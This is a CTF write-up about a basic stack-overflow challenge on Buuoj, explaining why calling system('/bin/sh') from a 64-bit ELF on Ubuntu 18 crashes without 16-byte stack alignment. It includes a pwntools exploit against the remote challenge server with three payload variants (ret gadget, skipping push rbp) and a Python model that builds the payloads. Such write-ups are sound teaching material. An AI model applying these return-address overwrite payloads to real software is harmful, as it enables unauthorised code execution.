[Pwn] Issues that may occur when calling system in 64-bit ELF in Ubuntu18



title: Issues that may occur when calling system in 64-bit ELF in Ubuntu18
date: 2022-03-31
tags: ["Pwn", cheatsheet, CTF]
authors: [nova]

Issues that may occur when calling system in 64-bit ELF in Ubuntu18

Recently, when I set up Ubuntu18 and was testing it, I encountered a problem.

After researching for a long time, I finally solved it and decided to take some notes.

Challenge — Buuoj — RIP

{/* truncate */}

Problem

This challenge is a basic stack overflow. There is a backdoor function that directly calls system("/bin/sh"), and no protections are enabled. In theory, overwriting the return address with the backdoor's address should be enough.

Indeed, it worked fine during local testing, but issues arose during remote testing.

Upon further investigation, I discovered that when a 64-bit ELF program on Ubuntu18 or later calls the system function, stack alignment inside libc has to be considered: the stack pointer must be 16-byte aligned at the call to system, because glibc's system uses SSE instructions such as movaps on stack memory, and a misaligned access crashes the program.

Solution

Changing the payload length (adding a ret gadget, or jumping one byte past the backdoor's push rbp) or performing stack pivoting resolves this issue.

The main idea is to shift the stack pointer by 8 bytes so that it is 16-byte aligned when system is called.

Here is an example exploit:

from pwn import *
context(log_level='debug', arch='amd64', os='linux')
# sh = process("./pwn1")
sh = remote("node4.buuoj.cn", 29726)
# sh.recvuntil('please input\n')
backdoor_addr = 0x0401186
# payload = b'a'*(0xf+8) + p64(backdoor_addr) # Normal idea, but fails: rsp is not 16-byte aligned when system is called
# payload = b'a'*0xf + p64(backdoor_addr) # Exploit 1, not very clear why this works:<
# payload = b'a'*(0xf+8) + p64(backdoor_addr) + p64(backdoor_addr - 1) # Exploit 2, backdoor_addr - 1 is a lone 'ret'; any other ret gadget works too, the extra pop shifts rsp by 8 to restore alignment
payload = b'a'*(0xf+8) + p64(backdoor_addr + 1) # Exploit 3, +1 skips the 1-byte 'push rbp' at the start of the backdoor, so rsp is 16-byte aligned at the call to system
"""
It doesn't have to be +1: any adjustment that leaves rsp 16-byte aligned at the call to system works. If none does, try stack pivoting.
"""
sh.sendline(payload)
sh.interactive()
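To make the alignment argument checkable rather than trial-and-error, here is an added example (my own code, not part of the original post or the challenge) that tracks rsp modulo 16 from main's hijacked ret to the entry of system under the x86-64 SysV model, and builds the three payload shapes discussed above with plain struct packing. It reuses the page's backdoor address and padding; the assumptions are that backdoor_addr - 1 is a lone ret byte (as the post states) and that the backdoor function begins with the usual gcc push rbp prologue, which is what makes the +1 trick work.

```python
import struct

# Values taken from the page's exploit: address of the backdoor function and
# the buffer-to-return-address distance. RET_GADGET is an assumption: the page
# uses backdoor_addr - 1 as a lone `ret` (0xc3) byte.
BACKDOOR_ADDR = 0x401186
RET_GADGET = BACKDOOR_ADDR - 1
PADDING = 0xF + 8


def p64(value):
    """Pack an address as a little-endian 64-bit value (pwntools-free p64)."""
    return struct.pack('<Q', value)


def rsp_mod16_at_system_entry(extra_rets=0, skip_push_rbp=False):
    """Track rsp modulo 16 from main's hijacked `ret` to the entry of system().

    Model of the x86-64 SysV ABI: a function is entered with rsp % 16 == 8
    (the caller had an aligned stack and `call` pushed 8 bytes). main's
    `push rbp` realigns to 0, and `leave; ret` undoes both pushes, so right
    after the overwritten return address is popped rsp % 16 == 0 instead of
    the 8 a normal function entry expects.
    """
    rsp = 0                               # after main's `ret` popped our address
    rsp = (rsp + 8 * extra_rets) % 16     # each `ret` gadget pops 8 more bytes
    if not skip_push_rbp:                 # assumed prologue of the backdoor: push rbp
        rsp = (rsp - 8) % 16
    rsp = (rsp - 8) % 16                  # `call system` pushes a return address
    return rsp


def system_entry_is_aligned(extra_rets=0, skip_push_rbp=False):
    """True when system() is entered as the ABI requires (rsp % 16 == 8).

    With rsp % 16 == 0 on entry, glibc's own stack frame ends up misaligned
    where a movaps stores to it and the process dies with SIGSEGV.
    """
    return rsp_mod16_at_system_entry(extra_rets, skip_push_rbp) == 8


def build_payload(strategy):
    """Return (payload, predicted_ok) for one of the three payload shapes."""
    if strategy == 'plain':          # the "normal idea" from the page
        chain = [BACKDOOR_ADDR]
        ok = system_entry_is_aligned()
    elif strategy == 'ret_gadget':   # pop 8 extra bytes before the backdoor runs
        chain = [RET_GADGET, BACKDOOR_ADDR]
        ok = system_entry_is_aligned(extra_rets=1)
    elif strategy == 'skip_push':    # page's exploit 3: land just past `push rbp`
        chain = [BACKDOOR_ADDR + 1]
        ok = system_entry_is_aligned(skip_push_rbp=True)
    else:
        raise ValueError(strategy)
    payload = b'a' * PADDING + b''.join(p64(a) for a in chain)
    return payload, ok


if __name__ == '__main__':
    for name in ('plain', 'ret_gadget', 'skip_push'):
        payload, ok = build_payload(name)
        print(f'{name:10s} {"aligned" if ok else "MISALIGNED"} {payload.hex()}')
```

The model also explains the "try a different length" advice: only an odd number of extra 8-byte pops fixes the alignment, so two ret gadgets in a row put you back where the plain payload started. When debugging a real crash, confirm the model against gdb by breaking on the faulting movaps and checking that rsp ends in 8 rather than 0.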

In-depth Analysis

Here, I plan to look at the stack at the moment system is called, which also serves as an initial exploration of gdb.

Oh no, it seems like gdb in Ubuntu18 is not working properly. I’ll add more details once it’s fixed:<

Reference Blogs

Issues with calling system function in some 64-bit glibc payloads

Stack balance issues involved in ret2text

Solving the program coredump issue caused by MOVAPS instruction after upgrading to gcc7.3
